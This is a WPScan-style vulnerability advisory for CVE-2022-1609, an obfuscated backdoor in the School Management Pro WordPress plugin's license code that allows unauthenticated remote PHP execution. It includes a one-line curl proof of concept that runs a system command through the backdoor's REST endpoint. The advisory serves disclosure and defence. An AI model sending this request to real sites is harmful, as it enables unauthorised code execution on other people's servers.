WordPress Plugin Vulnerabilities

The School Management < 9.9.7 - Unauthenticated RCE via REST api

Description

The plugin contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.

Proof of Concept

curl -d 'blowfish=1' -d "blowf=system('id');" 'https://examples.com/wp-json/am-member/license'

Affects Plugins

school-management-pro

Fixed in version 9.9.7

References

CVE

CVE-2022-1609

Classification

Type

RCE

OWASP top 10

A1: Injection

CWE

CWE-94

Miscellaneous

Original Researcher

Jetpack Scan Team + WordPress elevated support team

Submitter

Harald Eilertsen

Submitter website

https://jetpack.com

Verified

Yes

WPVDB ID

e2d546c9-85b6-47a4-b951-781b9ae5d0f2

Timeline

Publicly Published

2022-05-18 (about 8 months ago)

Added

2022-05-18 (about 8 months ago)

Last Updated

2022-05-18 (about 8 months ago)

Our Other Services

WPScan WordPress Security Plugin